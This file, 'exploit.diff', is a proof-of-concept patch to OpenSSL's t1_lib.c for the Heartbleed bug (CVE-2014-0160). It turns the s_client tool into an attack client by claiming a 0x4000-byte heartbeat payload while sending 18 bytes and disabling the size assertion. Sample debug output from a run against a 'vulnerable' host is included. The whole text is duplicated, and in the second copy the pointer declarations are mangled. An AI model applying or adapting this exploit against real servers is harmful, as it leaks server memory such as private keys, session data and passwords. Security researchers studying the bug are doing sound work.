alinefr/exploit.diff

## exploit.diff
The OpenSSL toolkit stays under a dual license, i.e. both the conditions of
the OpenSSL License and the original SSLeay license apply to the toolkit.
See below for the actual license texts. Actually both licenses are BSD-style
Open Source licenses. In case of any license issues related to OpenSSL
please contact openssl-core@openssl.org.

(c) Tim Brown, 2014
<mailto:timb@nth-dimension.org.uk>
<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>

PoC exploit for CVE-2014-0160.

If you apply this patch, you will then be able to trigger the bug
as follows:

$ apps/openssl s_client -debug -connect vulnerable:443
...
    Verify return code: 20 (unable to get local issuer certificate)
---
client> B
HEARTBEATING
write to 0x1ba0270 [0x1ba9da3] (30 bytes => 30 (0x1E))
0000 - 17 03 03 00 19 bb e6 52-26 20 74 c1 a7 99 fb da   .......R& t.....
0010 - 1a 6b 20 cd 8e 33 17 bb-83 a1 9c 73 c6 d2         .k ..3.....s..
write to 0x1ba0270 [0x1ba9da3] (66 bytes => 66 (0x42))
0000 - 18 03 03 00 3d bb e6 52-26 20 74 c1 a8 f7 23 2c   ....=..R& t...#,
0010 - 5a de d4 a3 e2 8d 14 e5-be a8 0c 66 2a 54 7d 13   Z..........f*T}.
0020 - 72 ef ba 33 a1 3c 83 6d-0a b9 96 32 7a d3 69 a2   r..3.<.m...2z.i.
read from 0x1ba0270 [0x1ba5853] (5 bytes => 5 (0x5))
0000 - 18 03 03 40 18                                    ...@.
read from 0x1ba0270 [0x1ba5858] (16408 bytes => 1371 (0x55B))
...

Patch is below:
--- openssl-1.0.2-beta1/ssl/t1_lib.c	2014-02-24 12:36:16.000000000 +0000
+++ openssl-1.0.2~beta1-patched/ssl/t1_lib.c	2014-04-08 10:02:06.819998579 +0100
@@ -3797,6 +3797,7 @@
 	/* Read type and payload length first */
 	hbtype = *p++;
 	n2s(p, payload);
+	printf("asked for %i bytes\n", payload);
 	pl = p;

 	if (s->msg_callback)
@@ -3820,6 +3821,8 @@
 		*bp++ = TLS1_HB_RESPONSE;
 		s2n(payload, bp);
 		memcpy(bp, pl, payload);
+		printf("copied %i bytes\n", payload);
+		printf("record was only %i bytes\n", s->s3->rrec.length);
 		bp += payload;
 		/* Random padding */
 		RAND_pseudo_bytes(bp, padding);
@@ -3860,7 +3863,7 @@
 	{
 	unsigned char *buf, *p;
 	int ret;
-	unsigned int payload = 18; /* Sequence number + random bytes */
+	unsigned int payload = 0x4000; /* Sequence number + random bytes */
 	unsigned int padding = 16; /* Use minimum padding */

 	/* Only send if peer supports and accepts HB requests... */
@@ -3888,7 +3891,7 @@
 	/* Check if padding is too long, payload and padding
 	 * must not exceed 2^14 - 3 = 16381 bytes in total.
 	 */
-	OPENSSL_assert(payload + padding <= 16381);
+	//OPENSSL_assert(payload + padding <= 16381);

 	/* Create HeartBeat message, we just use a sequence number
 	 * as payload to distuingish different messages and add
@@ -3913,7 +3916,7 @@
 	/* Random padding */
 	RAND_pseudo_bytes(p, padding);

-	ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3 + payload + padding);
+	ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3 + 18 + padding);
 	if (ret >= 0)
 		{
 		if (s->msg_callback)
	The OpenSSL toolkit stays under a dual license, i.e. both the conditions of
	the OpenSSL License and the original SSLeay license apply to the toolkit.
	See below for the actual license texts. Actually both licenses are BSD-style
	Open Source licenses. In case of any license issues related to OpenSSL
	please contact openssl-core@openssl.org.

	(c) Tim Brown, 2014
	<mailto:timb@nth-dimension.org.uk>
	<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>

	PoC exploit for CVE-2014-0160.

	If you apply this patch, you will then be able to trigger the bug
	as follows:

	$ apps/openssl s_client -debug -connect vulnerable:443
	...
	Verify return code: 20 (unable to get local issuer certificate)
	---
	client> B
	HEARTBEATING
	write to 0x1ba0270 [0x1ba9da3] (30 bytes => 30 (0x1E))
	0000 - 17 03 03 00 19 bb e6 52-26 20 74 c1 a7 99 fb da .......R& t.....
	0010 - 1a 6b 20 cd 8e 33 17 bb-83 a1 9c 73 c6 d2 .k ..3.....s..
	write to 0x1ba0270 [0x1ba9da3] (66 bytes => 66 (0x42))
	0000 - 18 03 03 00 3d bb e6 52-26 20 74 c1 a8 f7 23 2c ....=..R& t...#,
	0010 - 5a de d4 a3 e2 8d 14 e5-be a8 0c 66 2a 54 7d 13 Z..........f*T}.
	0020 - 72 ef ba 33 a1 3c 83 6d-0a b9 96 32 7a d3 69 a2 r..3.<.m...2z.i.
	read from 0x1ba0270 [0x1ba5853] (5 bytes => 5 (0x5))
	0000 - 18 03 03 40 18 ...@.
	read from 0x1ba0270 [0x1ba5858] (16408 bytes => 1371 (0x55B))
	...

	Patch is below:
	--- openssl-1.0.2-beta1/ssl/t1_lib.c 2014-02-24 12:36:16.000000000 +0000
	+++ openssl-1.0.2~beta1-patched/ssl/t1_lib.c 2014-04-08 10:02:06.819998579 +0100
	@@ -3797,6 +3797,7 @@
	/* Read type and payload length first */
	hbtype = *p++;
	n2s(p, payload);
	+ printf("asked for %i bytes\n", payload);
	pl = p;

	if (s->msg_callback)
	@@ -3820,6 +3821,8 @@
	*bp++ = TLS1_HB_RESPONSE;
	s2n(payload, bp);
	memcpy(bp, pl, payload);
	+ printf("copied %i bytes\n", payload);
	+ printf("record was only %i bytes\n", s->s3->rrec.length);
	bp += payload;
	/* Random padding */
	RAND_pseudo_bytes(bp, padding);
	@@ -3860,7 +3863,7 @@
	{
	unsigned char buf, p;
	int ret;
	- unsigned int payload = 18; /* Sequence number + random bytes */
	+ unsigned int payload = 0x4000; /* Sequence number + random bytes */
	unsigned int padding = 16; /* Use minimum padding */

	/* Only send if peer supports and accepts HB requests... */
	@@ -3888,7 +3891,7 @@
	/* Check if padding is too long, payload and padding
	* must not exceed 2^14 - 3 = 16381 bytes in total.
	*/
	- OPENSSL_assert(payload + padding <= 16381);
	+ //OPENSSL_assert(payload + padding <= 16381);

	/* Create HeartBeat message, we just use a sequence number
	* as payload to distuingish different messages and add
	@@ -3913,7 +3916,7 @@
	/* Random padding */
	RAND_pseudo_bytes(p, padding);

	- ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3 + payload + padding);
	+ ret = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buf, 3 + 18 + padding);
	if (ret >= 0)
	{
	if (s->msg_callback)